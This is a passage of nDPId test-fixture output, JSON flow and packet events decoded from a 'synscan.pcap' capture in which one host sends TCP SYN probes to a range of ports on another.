-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsOg0AACsG42WsEAAIQA2GNIzSBKPdUoMYAAAAAGACEAAj7AAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsF+kAACgGCIqsEAAIQA2GNIzSHCDdUoMYAAAAAGACBAAYbwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsKVIAADUG6iCsEAAIQA2GNIzSFr7dUoMYAAAAAGACCAAZ0QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NYAACcGMJysEAAIQA2GNIzSBADdUoMYAAAAAGACEAAkjwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsP0EAACcG4jGsEAAIQA2GNIzSKYLdUoMYAAAAAGACEAD\/DAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsRFwAADMG0RasEAAIQA2GNIzSACDdUoMYAAAAAGACEAAobwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWBgAADIGvlqsEAAIQA2GNIzSOpzdUoMYAAAAAGACDADx8gAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAscJoAADMGpNisEAAIQA2GNIzSznDdUoMYAAAAAGACEABaHgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs10IAADEGQDCsEAAIQA2GNIzSABjdUoMYAAAAAGACCAAwdwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Q8AADcGKGOsEAAIQA2GNIzSE+3dUoMYAAAAAGACEAAUogAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+QAADkGo46sEAAIQA2GNIzSBRDdUoMYAAAAAGACCAArfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqBkAAC8GcVmsEAAIQA2GNIzSI47dUoMYAAAAAGACEAAFAQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHIAACwGdACsEAAIQA2GNIzTJr3dU4MZAAAAAGACBAANzwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstK4AADUGXsSsEAAIQA2GNIzTBR\/dU4MZAAAAAGACCAArbQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsP4IAACcG4fCsEAAIQA2GNIzTBN\/dU4MZAAAAAGACEAAjrQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstAIAAC8GZXCsEAAIQA2GNIzTOGrdU4MZAAAAAGACEADwIQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLAAADoGRcKsEAAIQA2GNIzTHfzdU4MZAAAAAGACDAAOkAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzThGvdU4MZAAAAAGACDACoIAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsv88AADcGUaOsEAAIQA2GNIzTD6PdU4MZAAAAAGACEAAY6QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFdcAACkGCZysEAAIQA2GNIzTBCvdU4MZAAAAAGACCAAsYQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAspR4AACUGflSsEAAIQA2GNIzTFw\/dU4MZAAAAAGACCAAZfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZasAADQGrsesEAAIQA2GNIzTI\/DdU4MZAAAAAGACBAAQnAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAYwAADEGFeesEAAIQA2GNIzTB9XdU4MZAAAAAGACCAAotwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACcGEU6sEAAIQA2GNIzTA0vdU4MZAAAAAGACEAAlQQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsXIoAADgGs+isEAAIQA2GNIzTCo3dU4MZAAAAAGACBAAp\/wAAAgQFtA=="} 
